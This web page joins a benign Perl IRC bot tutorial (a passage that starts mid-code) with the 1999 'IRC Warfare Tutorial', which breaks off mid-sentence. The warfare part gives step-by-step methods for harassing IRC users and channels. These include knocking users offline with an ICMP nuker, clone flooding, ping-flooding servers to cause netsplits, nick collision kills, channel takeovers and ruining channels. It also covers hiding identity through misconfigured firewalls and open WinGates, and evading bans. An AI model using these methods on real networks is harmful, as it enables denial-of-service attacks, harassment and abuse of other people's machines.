  print $sock “PONG $text\n”;
  next;
 }
 #done with ping handling

 ($nick,$type,$channel) = split(/ /, $line); #split by spaces

 ($nick,$hostname) = split(/!/, $nick); #split by ! to get nick and hostname seperate

 $nick =~ s/://; #remove :’s
 $text =~ s/://;

 #get rid of all line breaks.  Again, many different way of doing this.
 $/ = “\r\n”;
 while($text =~ m#$/$#){ chomp($text); }

 #end of parsing, now for actions
}

ok. That was a rather large chunk of code and some parts were rather confusing. Most of
it is just getting rid of what we don’t want and seperating what we do want into variables.
The next bit is just for looks. We print out what is said as if this is a normal irc client.

if($channel eq '#channel'){
 print "<$nick> $text";
}

The $channel check is needed incase people priv_msg or notice you things. This can be a
problem when dealing with bots which need to be secure or can cause large headaches when
things go wrong. I’ll leave dealing with multiple channels to you. But to send Notices
you simply do: print $sock “NOTICE nick :the line of text here\n”; and to send a
priv_msg you do: print $sock “PRIVMSG nick :the line of text here\n”;

Now the bot structure is done. Everything required is done, the only thing left to do
is custimize your bot to have it do what you want it to do. This can be almost any sort
of task imaginable. Simply parse the $text $nick and other variables we created to
have the bot make decisions on what to do.

Here is the final bot in whole. I added one bit just to prove that the bot works:

#!/usr/bin/perl
use IO::Socket;

$sock = IO::Socket::INET->new(
 PeerAddr => 'irc.undernet.org',
 PeerPort => 6667,
 Proto => 'tcp' ) or die "could not make the connection";

while($line = <$sock>){
 print $line;
 if($line =~ /(NOTICE AUTH).*(checking ident)/i){
  print $sock "NICK b0ilersbot\nUSER bot 0 0 :just a bot\n";
  last;
 }
}

while($line = <$sock>){
 print $line;
 #use next line if the server asks for a ping
 if($line =~ /^PING/){
  print $sock "PONG :" . (split(/ :/, $line))[1];
 }
 if($line =~ /(376|422)/i){
  print $sock “NICKSERV :identify nick_password\n”;
  last;
 }
}

sleep 3;
print $sock “JOIN #channel\n”;

while ($line = <$sock&gt  {
 ($command, $text) = split(/ :/, $line);   #$text is the stuff from the ping or the text from the server

 if ($command eq ‘PING’){
  #while there is a line break - many different ways to do this
  while ( (index($text,”\r”) >= 0) || (index($text,”\n”) >= 0) ){ chop($text); }
  print $sock “PONG $text\n”;
  next;
 }
 #done with ping handling

 ($nick,$type,$channel) = split(/ /, $line); #split by spaces

 ($nick,$hostname) = split(/!/, $nick); #split by ! to get nick and hostname seperate

 $nick =~ s/://; #remove :’s
 $text =~ s/://;

 #get rid of all line breaks.  Again, many different way of doing this.
 $/ = “\r\n”;
 while($text =~ m#$/$#){ chomp($text); }

 if($channel eq ‘#channel’){
  print “<$nick> $text”;

  if($text =~ /hi b0ilerbot/gi){
   print $sock “PRIVMSG #channel :hi $nick\n”;
  }
 }
}

Not very complicated once you look at each part of it. But finding out things for yourself
is the real fun of creating a bot. Much trial and error is involved in perfecting the bot,
adding security and function can be alot of fun. I would like to stress the security of irc bots.
They are in the most hostile environment known to the net and one security mistake and your
bot could be used to execute commands on your box. I have found 4 irc perl bots vulnerable
to remote command execution, don’t let me find yours vulnerable aswell! Read all of the perl
security related tutorials at http://b0iler.eyeonsecurity.net/tutorials/
Don’t let this discurage you from coding your own bot, it’s a great learning experience and as long as you
are careful you should be fairly safe. I would love to hear what kind of bots you come up with. The bots
I have created include:

quote bot - a bot which has many features that deal with irc quotes. it reads off funny/witty things
people have said while chatting in my channels. It also has some more advanced features such as listing
off all the users in the channel who have a quote and an admin feature which allows me to add quotes while
the bot is running.

quiz bot - A bot which quizes the channel users. I used this while studying for networking. This bot is
great when the channel is dead or to start up a conversation with others. I learned alot from this bot.

poker bot - A bot which plays poker. I started to make a ucker (sp?) bot, but I lost motivation when the
other people who wantted to play quit going on irc.

channel bot - A bot which enforces the channel rules. it warns, kicks, and kick bans users for breaking the
rules. it voices,half ops, and ops identified users and keeps stats of channel activity. Good for preventing
channel takeovers.

The reason for creating this text was because I remember the stress I had finding info on this subject when
I first created the bot. I have since read a few crappy papers on irc bots, but nothing which would be very
helpful.

[-----]

The IRC Warfare Tutorial

Written by The Cyber God

http://blacksun.box.sk

---

Version 1.1, 24/9/99

Updated , 7/20/01 by Mikkkeee

Converted to HTML by Mikkkeee

[Editor Notes]

Please send comments, questions and feedback to talrun@actcom.co.il

You can always visit us at http://blacksun.box.sk/

[Disclaimer]

We will not help you actualize the things that you will learn here.

The information here is for educational purposes only (for learning

how the attacks are done and how to prevent them).

We are not responsible in any way for any damage that might happen

to you. This includes software damages and law issues.

[Table Of Contents]

1. What is IRC?
2 An introduction to the way that IRC works
3 Some notes on different IRC networks and their daemon software
4 Why IRC wars started
5 What do the others know about me?
6 How to spoof / hide your identity on the IRC
7 Bans and how to bypass them
8 I don’t like your nickname… / Getting a user off the IRC
9 Can I get caught and will I?
10 What are netsplits and how can they help me?
11 Channel Takeovers
12 How To Completly Ruin A Channel
13 Some expansion about RAW sessions
14 Faking /ctcp replies
15 How to spoof via https proxys
16 War Scripts
17 Editorial - IRC wars, another perspective
18 Some interesting articles by Packet
19 Bibliography

[What is IRC?]

IRC stands for “Internet Relay Chat”. Jarkko Oikarinen originally wrote

it in 1988. Since starting in Finland, it has been used in over 60 countries

around the world. It was designed as a replacement for the “talk” program

but has become much, much more than that. IRC is a multi-user chat system,

where people meet on “channels” (rooms, virtual places, usually with a

certain topic of conversation) to talk in-groups, or privately. There is

no restriction to the number of people that can participate in a given

discussion or the number of channels that can be formed on IRC.

[An introduction to the way IRC works]

All the communications in the world of IRC are done through the server.

(This does not includes the DCC (Direct Client Communication) protocol)

When you connect to a server, you send it 2 commands: NICK & USER.

These commands are used to identify you on the IRC. Here is the format

of the commands:

NICK nickname - Sets your nickname

USER username host server :real name - Set your userid and real name.

Host is your host and server is the server you are connecting to.

For example to open a raw IRC session you can telnet to an IRC server

on port 6667 or 7000 (the standard ports). Here is an example for telneting

my localhost (note: the lines beginning with * have been written by me.

The rest are the output I got from the server):

* nick ^TCG^

NOTICE ^TCG^ :*** If you are having problems connecting due to ping

timeouts, please type /notice E3AA3478 nospoof now.

PING :E3AA3478

* user ^TCG^ 127.0.0.1 localhost :The Cyber God

:localhost 001 ^TCG^ :Welcome to the DALnet IRC Network ^TCG^!~tcg@thegod.actcom.co.il

:localhost 002 ^TCG^ :Your host is localhost[thegod.actcom.co.il],

running version dal4.6.7.DreamForge.win32

:localhost 003 ^TCG^ :This server was created Fri Jul 24 07:48:52 1998

:localhost 004 ^TCG^ localhost dal4.6.7.DreamForge.win32 oiwsghOkcfrRaAb

biklmnopstvR

:localhost 005 ^TCG^ NOQUIT TOKEN WATCH=128 SAFELIST :are available

on this server

:localhost 251 ^TCG^ :There are 0 users and 0 invisible on 1 servers

:localhost 253 ^TCG^ 4 :unknown connection(s)

:localhost 255 ^TCG^ :I have 0 clients and 0 servers

:localhost 265 ^TCG^ :Current local users: 0 Max: 0

:localhost 266 ^TCG^ :Current global users: 0 Max: 0

:localhost 422 ^TCG^ :MOTD File is missing

:^TCG^ MODE ^TCG^ :+iw

…

ok

As you can see, the second parameter of the USER commands includes my

IP. You might be thinking right now that you could enter any IP you want

and fake your IP. Well you are wrong. On really older versions of the IRC

daemon (Those that were used in Efnet), you WAS able to spoof your IP.

But today there are 2 types of antispoof-patches: The one that doesn’t

care about the IP you entered and connects you using your real IP (which

it gets from the socket) and the other one just doesn’t allow you to connect

to the server until you give your real IP address.

The first method of Anti-Spoofing is most used most in the server version

of DALnet and the second is used most by EliteIRCD (which is based on DALnet)

and the servers that are based on it.

Now, if it all goes ok then you just opened a raw session to IRC!

All the data transferred to the user (Private Messages/Notices and

Channel Events) is transferred from the server. If the user that sent you

a message is on a DIFFERENT server than you (but NOT a different network)

the message “moves” from the servers until it reaches your server and you.

To send someone a message in our raw IRC session type: ‘PRIVMSG nick :message’

(without the quotes) where nick is the target nickname and message is the

message (You must include a : before the message).

When a message moves from server to server it looks like this:

:SenderNick PRIVMSG nick :message

All the IRC commands move from server to server like this. For example

when someone uses the NICK command ALL the servers get a notice about it.

[Some notes on different IRC networks

and their daemon software]

Different IRC networks have different IRC daemons. It is important

to know the futures / limits of the server your network uses. For example,

OLD Efnet servers don’t know the +b channel mode (ban someone). When trying

to start IRC wars you need to know what are the limitations of the server.

If it got services, if so does they have a bug that can crash them? Can

you obtain Channel Operator in a net-split (we’ll get to that)? And so

on… During the rest of this tutorial we will discuss different daemon

software and bugs, as well as different ways to “get in”.

[Why IRC wars started?]

Generally, IRC wars started on the IRC network Efnet. In this IRC network

you can’t register your nickname so ANYONE can use it. If for example someone

logged to this IRC network (By the way, did you know that it is the first

IRC network ever (!)) and he saw that his nick is taken. He probably said

something like “How Rude?!” or “Mother-F*cker” or anything else. Then he

started thinking about ways to get this user off the server. Users started

to try many different things on each other and that’s pretty much how IRC

wars started. Today, users might start IRC wars “just for fun”, or for

taking over channels they don’t like or kicking off users they don’t like.

[What do the others know about me?]

OK people! This is actually the first important thing about the IRC

wars. Before starting out you need to know what others can find out about

you and what can you find out about them.

If you are not connected through a BNC, firewall or a shell (we’ll get

to this neat stuff later), what I mean, that if you are connected directly

to the IRC, using a dial-up for example users can first of all knows your

IP. Newbies might say right now, ok… well…. So he knows my IP… who

gives a shit anyway?

Well if you said this you are wrong. Let’s take a look on my host (resolved

IP) for example:

P34.haifa2.actcom.co.il
|    |        |      |_ You can see that my ISP is in Israel, and so am I (unless
|    |        |         I’m dialing to foreign ISPs just to cover my identity, which 
|    |        |         is a thing people don’t do because of… financial issues).
|    |        |_ You can see that my ISP (Internet Service Provider) is Actcom
|    |_ You can see that I am from Haifa ).
|_My modem number at the ISP’s office.

See how many things the host gave you?

1) My ISP

2) My city

3) My country

Now You can also know that if my ISP address is actcom.co.il you can

send complains about me to abuse@actcom.co.il for example, give them my

IP and tell them what I did to you and they will do the rest.

That is what users know about you. Some times you will only see numbers

like 19.114.47.1 and not the host. That is because the server failed to

resolve your hostname. To resolve it you can download a program called

‘nslookup’ from somewhere (note: nslookup comes with all Unix systems),

give it the IP and it will try to resolve it. Also see the entry ‘DNS Servers’

in the Newbies Corner.

Now, for those who don’t know you can get the IP/host by “whoising”

the user.

To do a whois on a user in mIrc, BitchX, IRCii, Pirch and some other

known IRC clients all you need to do is type /whois nickname

To whois someone in our raw connection (the one I taught you how to

establish at the beginning) type ‘whois nickname’ (without the quotes)

Here is what I get when I whois my self in the raw connection:

whois ^TCG^

:localhost 311 ^TCG^ ^TCG^ ~TCG thegod.actcom.co.il * :The Cyber God

:localhost 312 ^TCG^ ^TCG^ localhost :test server

:localhost 317 ^TCG^ ^TCG^ 9 932030074 :seconds idle, signon time

:localhost 318 ^TCG^ ^TCG^ :End of /WHOIS list.

Ok, before I explain what you got here, here is the format:

Format: :server-name raw-number sender target data.

Server-name is the server that gives you the data.

Raw-number is the ID of the data you got (it is used to determine what

data you are getting).

Sender: the senders nickname (you!!).

Target: The target (The nick you are whoising).

Data: The data.

Now here is an explanation on all the 4 lines

In the first one you see the user-name and the host of the user, you

also see his real name:

~TCG thegod.actcom.co.il * :The Cyber God
  |     |                         |_ The user’s real name (you can fake this :))
  |     |_ The user host or IP
  |
  |_ The username (set by IdentD, will be explained later,
     when followed by a ‘~’ you see that the IdentD is NOT 
     running and the Ident (username) might be fake).

The second line:
localhost :test server
    |             |_ Comment about the server (set by the server admin)
    |_ The server that user is connected to

Third line:
9 932030074 :seconds idle, signon time
|      |_When the user signed in
|_ How many seconds has he been idle

Last line:
:End of /WHOIS list.
     |_ Shows you that there is no more data.

Also, when users know your IP they can start almost any Denial of Service

(DoS) attack on your host like WinNuke (Arggg… Lame Lame Lame!!!) or

a lovely ping flood that will chew up all of your bandwidth, depending

on the attacker’s bandwidth (for more info and more sophisticated DoS attacks,

see the DoS tutorial at blacksun.box.sk).

[How to spoof / hide your identity on the

IRC]

After seeing what users can find out about you, it is time to learn

how to hide your identity.

There is no easy and lame way to do this. Here are the most knows ways:

FireWall, WinGate and a Bouncer aka (As Knows As) BNC.

We will start from the firewall.

The firewall we are talking about is software that runs on some machine

and is used to filter incoming packets (packets that arrive to the machine

which is running the firewall) and outgoing packets (packets that are sent

from the machine which is running the firewall). Some firewalls are not

configured very well and allow anyone to connect to them. The hard part

is to find a working one that will allow you to use it to connect through

it, and once you are connected, using it so users that will whois you or

dns you will see the firewall’s IP! If, for example, there is a misconfigured

FireWall on the host firewall.someone.com, you can use it in mIRC, for

example, by starting the mIRC program (I use the newest version 5.6, go

download it at www.mirc.co.uk) and:

1. Click on the Files menu, then Options.

2. On the topmost label of the tree where you can see ‘Connect’, If

you see a ‘+’ next to it click it. If you see a ‘-’ go to the next step

3. Click on the sub-item Firewall (duh…)

4. Be sure the ‘Use SOCKS firewall’ checkbox is marked (has an ‘X’

in it).

5. In the Hostname field, write the IP / Hostname of the firewall.

For example lets use firewall.someone.com

6. Leave the USER ID and PASSWORD empty, and make sure the port in

1080.

7. Click OK.

Now, next time you will type /server … To connect to the IRC server

the connection will be relayed through the firewall, so if someone will

whois you he would see something like this:

:localhost 311 ^TCG^ ^TCG^ ~TCG firewall.someone.com * :The Cyber God

:localhost 312 ^TCG^ ^TCG^ localhost :test server

:localhost 317 ^TCG^ ^TCG^ 9 932030074 :seconds idle, signon time

:localhost 318 ^TCG^ ^TCG^ :End of /WHOIS list.

You can see that my host is NO LONGER thegod.actcom.co.il, instead it

is now firewall.someone.com!!

Now I am protected. You might be asking right now where to get the

firewalls hosts. One idea is go asking your friends. Other is going to

Altavista (www.altavista.com) and searching for “firewall AND list” and

stuff like that.

Another way of spoofing your IP is a WinGate. WinGate is software for

Windows that is used to let several computers that are connected through

a local network of some sort to use one computer’s Internet access. It

also allows you to fake your IP _EXACTLY_ the same way. After installing

WinGate, anyone will be able to use it if you don’t configure it well (I

personally recommend using SyGate instead). To find Wingate addresses you

can ask your friends, run a Wingate scanner that will scan whole subnets

for Wingates or look for lists on the web.

Note: newer versions of the IRC daemons will automatically check for

an open Wingate or a firewall, and if they will detect one they will kill

your session and might even K-Line (Ban the host from using the server/network)

the host as well.

Now, on to the Bouncer (aka BNC) spoofing.

Bouncer is software that runs on Unix computers. If, for example, there

is a BNC on bnc.shell.com on port 1234, you can connect to it by typing:

/server bnc.shell.com 1234

After that you should be getting something like this:

-BNC- Please type your password via /quote pass

Crap… You need a password. If you know the password you have no problem.

Just type ‘/qoute pass password’ (without the quotes), and replace ‘password’

is your password.

If you don’t know the password you need to ask the guy that gave you

the BNC (or you could always hack the server… but this tutorial is

about IRC warfare, not hacking servers and getting passwords). You should

also ask him if it (the BNC) has vhosts. Vhosts are multiple IPs and hostnames

for the same BNC. If it has vhosts, you can set your active host by typing

‘/quote vip the.host.name.here’ (as you should be able to figure by now,

it is done without the quotes).

After this you type ‘/conn server’. For example /conn irc.dal.net will

connect you to irc.dal.net with the bouncer’s host.

Note: unlike firewalls and badly configured Wingates, the server cannot

detect a BNC, so there is no chance you will be banned for using it.

[Bans and how to bypass them]

Channel Operators might ban you after you have done something in their

channel that made them angry .

To bypass a ban you first need to know the ban type. There are a few

ban types:

1. nick!*@* - Bans you by your nickname. All you need to do is change

your nick (by typing /nick newnick, or in raw session NICK newnick) and

you can reenter the channel.

2. *!user@* - Bans you by your Ident (UserID). If your computer is

not running an IdentD daemon (A win9x with mIRC for example) you can easily

change your Ident by clicking on the File menu, selecting Options, opening

the ‘Connect’ sub-tree, clicking the IdentD label and changing the User

ID. If you are under a Unix / Linux machine that is already running an

IdentD daemon, you can’t change it because it automatically sets your ident

username to your login name. To change this you need to logon to the IRC

through a Bouncer because bouncers fake you IdentD.

3. *!*@host - You are banned by your IP / host. All you need to do

is to connect through a firewall or a Wingate.

Some times the bans are more complex like ^TCG^!*@*.actcom.co.il.

This ban will prevent anyone named ^TCG^ with host that ends with .actcom.co.il

If you are interested here is the format:

Nick!user@host / IP
 |    |      |_ The IP or hostmask.
 |    |
 |    |_ Your username. The IdentD sets this. When running IdentD daemon it
 |       mostly not faked but when running windows or connection through a 
 |       bouncer it is probably faked.
 |
 |_The user nickname. If might also contain wildcards like *T*C*G*.
   This will prevent anyone with the letters T, C and G (in this order) 
   to join the channel.

Examples: ^TCG!*@*.actcom.co.il
             | |      |_________The server
             | |_Your Ident user (defined as the wildcard ‘*’, meaning ANYTHING)
             |_Your nickname

As you probably know, channels have different modes. For example +o to

make a certain person an OP (Operator), +b to ban a person etc’. To set

a ban you type: /mode #Channel +b nick!user@host and to remove a ban you

type /mode #Channel -b nick!user@host

On a raw session you don’t need the ‘/’.

[I don't like your nickname... / Getting

a user off the IRC]

The easiest way to get a user off the IRC is using a program called

“Click2″ for Windows.

If might not always work and it is considered extremely lame, but it

might work sometimes.

After you got this program, do the following:

1. Set the “Packets to:” option box to “Clinet”

2. In the Server textbox fill-in the TARGET server. You can figure

it out by doing a /whois or a /dns on the target’s nickname.

3. In the Client textbox fill-in the TARGET IP address. You can also

figure this by doing a /whois or /dns on him but if he uses any spoofing

technique like a BNC or a Wingate it won’t harm him even a bit (it may

harm the Wingate / Firewall / BNC, though).

4. Be sure that you set it to send 64 packets every 1000ms in the 2

textboxes at the end of the window.

5. The client start port should be 1024 and the stop 1500.

6. Now hit nuke….

This is what you will see if it worked and you were in a channel, and

the target in also in this channel:

*** Quits: ^TCG^ (Connection reset by peer)

(Or something likes this)

The target should see something like this:

*** [10053] Software caused connection abort

If it is not working, you won’t see anything and he won’t either. If

he is running some packet-logger that logs ICMP packets he will see your

IP but most users do not run these.

Another lame way is to try winnuking the address. I won’t explain here

how to do it and what winnuke is because it has nothing to do with this

tutorial (see R a v e N’s DoS tutorial for Winnuke information, as well

as information on more sophisticated attacks).

Here is a more complex way.

You will need a flood program like “Floods”. (Ask me if you want it)

After running it or any other flooding script that is based on clone

loading you connect the clones to the target IRC server. (~6 clones should

do the job)

Before we continue, I want to explain you how this works.

Each user on the IRC got something called SendQ and RecvQ. They contain

the data the user is sending / receiving.

They also have a maximum value. If this value is achieved, the server

will automatically close their connection.

Flood programs and flood scripts load clones (computer-operated IRC

“users”) and start sending lot of crap to the target nick, causing his

RecvQ to fill up and he should get disconnected :).

So after you launched the program, you start flooding. I can’t tell

you exactly how because there are lot of programs and I can’t explain you

how every one works, but I can help you via my e-mail: talrun@actcom.co.il

There are also more advanced programs that support clone loading through

firewalls and Wingates. When a user loses his connection to the IRC because

of such an attack, everyone on every channel he was present on will see

the following:

*** Quits: ^TCG^ (Excess Flood)

Another way of disconnecting a user from the IRC is exploiting a bug

in his OS. You need to determine his OS and start this attack on him. There

are lots of different types of attacks. To learn about them, read R a v

e N’s DoS tutorial.

[Can I get caught and will I?]

First of all, it depends on what you are going to do or already did.

When you are going to take over a channel for example, if you are doing

it without hiding your identity first (See previous chapter) you can get

caught but nothing will probably happen to you. You might receive a DoS

attack that can terminate your IRC session or lag you like hell. If you

are using a bouncer for example, you won’t get caught for this. But if

you “click” someone and he logs the packets he can e-mail your ISP with

your IP and they might kill your account.

If you are killing someone with a netsplit (See next chapter) you won’t

get caught and nothing will happens to you since you haven’t done anything

illegal.

Also, it is good to know as much as possible about your target. If you

see some one that is named ‘Ass^Hole’ for example, you have no good reason

to go packet him or flood him. He might have access to an OC3 or a DS-3

line (Extremely fast connections to the Internet) and he might also detect

your attacks and start flooding you in return. Trust me, you don’t want

this to happen. One day my T3 line got ping flooded from an OC3 line and

it stopped working for about 30 minutes. Just for your information, OC3

can transfer up to 255Mbit and a T3 can transfer up to 9Mbit (I think).

If such a line will flood your computer you don’t stand a chance.

[What are netsplits and how can they help

me?]

Large IRC networks consist of various servers. A NetSplit occurs when

a link between one of the servers and the others gets broken because of

lag or other reasons. All users that were connected to this channel will

be separated from the others as long as the netsplit occurs.

Therefore, lots of channels become empty, and get closed. When you

will join a channel that became empty, or you left only 1 user in the channel

and you will cycle it, there is a chance that you will obtain the channel

operator status (OP, @).

On a NetJoin (When the server relink to the entire network again) you

might still have the channel operator status. On new servers, you won’t

get the operator status when the network is in a spilt mode, but if you

could find an old server or network you just might get lucky. Breaking

a connection between 2 servers by yourself is very difficult. You need

to pick 2 servers that are already lagged and start ping-flooding the target

server from a fast connection.

Once a netjoin occurs, it is recommended to have a war script (we’ll

get to those) that will DeOP everyone on the channel so other OPs won’t

be able to DeOP you.

NetSplits can also let you disconnect a user from the IRC. Let’s say

you want to disconnect a user named ‘Lamer’. When a netsplit occurs, there

are two different possibilities:

1) The target user (’Lamer’, in our case) was on the server that did

the netsplit and has left the IRC network, but will return once a netjoin

occurs (shouldn’t take a lot of time).

2) The user is still on the network and has nothing to do with the

netsplit.

If number 1 occurs then all you need to do is connect to the network

using his nickname and wait for the netjoin. When the servers will re-link

they will see that there are 2 users with the same nickname. Such thing

cannot possibly happen, so one user must be killed. The user that was NOT

on the network, (which means he was on the splitted server) will probably

get killed. If option 2 occurs then all you can do is to put a clone (open

another IRC sesssion), connect to the splitted server and change your nick

to his nick. When the servers will rejoin there is a small chance that

he will get killed, so cross your fingers.

Now, for the 1,000,000$ question: how do I detect a netsplit? You can

detect a netsplit if the user(s) quit message is “Server1 Server2″. For

example:

Lamar has quit IRC (irc.magic.com irc.freei.net)
                           |             |_Server2
                           |_Server1

This message tells you that there is a split between irc.magic.com and

irc.freei.net

The second server (Server2) is the server that left the net.

[Channel Takeovers]

Channel takeovers are used to take a channel from a user, and prevent

him from reentering the channel or gaining operator status in the channel.

The first thing you need to do is to get ops. Here are 4 ways to get ops:

1. Via a NetSplit. (might take a lot of time)

2. Asking one of the ops to let you be an op (Who knows? You might

get lucky).

3. Running a bot on your computer or on a shell account and telling

the other ops that it is online 24 hours a day, and ask them to op it.

They might do it, then tell the bot to op you.

4. You can always lure the other ops into giving you op by telling

them that you will advertise their channel and bring them users and you

might earn the ops status.

You can do nothing without the OP status. Here is what you do after

you got an op and you want to close they’re channels:

1. First, mass de-op all the users so they won’t kick or ban you. There

are a lot of scripts out there that will do this for you.

2. Then place a ban on *!*@*

3. Mass-Kick the channel (also with a script)

4. After this set the following modes: +smilk 1 1 (you type /mode #Channel

+smilk 1 1)

5. You took over the channel!

There is a problem with this, when you will leave the channel he will

get empty and then closed. The only solution for this is placing a 24/7

(24 hours a day, 7 days a week) bot in the channel. If channel services

are available on this network (Like in DALnet), you can register the channel

if no one else have done this already.

If you took over a registered channel, you will have a problem keeping

it because Channel Services can give the channel back to its legal owner

with no problem.

[How to completely ruin a channel]

Here are some possible ways to completely ruin a channel:

1) Turning the channel into an invite-only channel, so only people

who were invited (to invite people, type /invite nick) can join.

2) Making the channel password-protected.

3) Making sure that you are the only OP in the channel and then turning

the channel into moderated mode and then mass-devoicing everyone. In moderated

mode, only voiced users (people with a little + in the beginning of their

nick. To voice people, do /mode #channel +v nick or -v to devoice) can

talk. That way, users will be able to see who is on the channel (note:

you can see who’s on a channel without joining it by typing /names #channel),

but they won’t be able to chat, and they will have to listen to you…

[Some expansion about RAW sessions]

Too lazy to read RFC ?

Well, this is the “SUMMARY” of rfc1459 (IRC Protocol). Hopefully after

reading this you’ll have better understanding of how the protocol work

(hey… don’t just use it… try to understand how it work). Yeah… this

is also how some people spoof their IP by telneting from some restricted

shell account with no IRC client access.

[Connecting to the IRC daemon]

Telnet/netcat (yep… we’re gonna use a raw socket) to the IRC port

(6667/6668..etc) of the IRC server.

eg <:> telnet irc.dal.net 6667

Send your nick & username to be recognized after u got connected

using the user command in this form “user ”.

eg <:> user nobody localhost localhost :I’m nobody nick nobody

————————-[!! NOTE !!]————————-

At any time if your receive anything like this

ping :1234567 <– The sequence number change all the time

or

ping :192.0.0.1 <– Some IP address

You must send back the number with a pong

eg <:> pong :1234567

or

pong :192.0.0.1

If you don’t pong back, you’ll be disconnected with a ping timeout error.

———————[!! END OF NOTE !!]——————-

[Exploring some basic commands]

Ok, after the nick & user commands you can start chatting now. Type

join #channel (Without the /) to join #channel.

(Yea… most commands you use in your BitchX or mIRC client can also

be

used here too…just don’t include the /

eg: part #channel

quit :I’m out

etc… )

To send your message to a channel, use the privmsg command.

eg <:> privmsg #channel : Hi guys…Sup? (Dont forget the “:” if

you are going to send more then one word)

This will send “Hi guys…Sup?” to #channel

To send a private message to a user:

eg <:> privmsg nickname : HI ya

This will send “HI ya” to nickname.

To set a mode on a channel you simply type mode #channel mode.

For example, MODE #Channel +b 192.114.*.* will ban everyone that they’re

IP begin with 192.114.

[Fun stuff to do]

If you get something like this “:nick!user@ip-address PRIVMSG your-nick

:_VERSION_”

this means that nick is trying ctcp/version you. This command is used

to find out your version.

Send the version back using the NOTICE command… it could be anything

you want.

eg : NOTICE nick :_VERSION Telnet version 0.1 _

This will send “Telnet version 0.1 :)” as the version reply.

[Faking /CTCP Replies]

Now many of you guys chat and have various people always doing{Client

for Client Protocol} CTCP replies, ie. VERSION, TIME, FINGER, PING

replies on you. These replies can get you in a lot of trouble, mainly its

a way for people to gather information about you then start up an attack.

Now it is time to change the replies your mirc will give in a way to cause

the other end to be fooled. Well this topic has been covered by many writers

and warscript developers, but many don’t know about changing the replies

to their advantage, well look no further, here we go!

One of the most devistating attacks can come from a VERSION reply.

To do a ctcp version reply on a user, all you have to do

is type:

“/ctcp VERSION ” This will return the nick’s irc client.

Now you may ask why is that important? Well lets say your using mirc 5.7x

which suffers from heap overflow of 217 bytes, and 5.8 heap overflow of

226 bytes by knowing your version an attacher already knows which

operating system your using and a version, so they can hack you without

a trojan and you won’t know it happened.

Lets kill the version reply to either give a fake reply or no reply

at all so they can sit there waiting, lol.

Okay you will need a hex editor for this, I recomment Hiew, get it

here!

-make a backup of your mirc32.exe.

-install hiew, load it up, once you have clicked mirc32.exe now you

will see some garbage, click F7 that should popup the search box, type

in VERSION you should be able to find the reply something like mIRC32 v5.8

K.Mardam-Bey. Now just delete the reply. If you have trouble doing it with

Hiew then get ano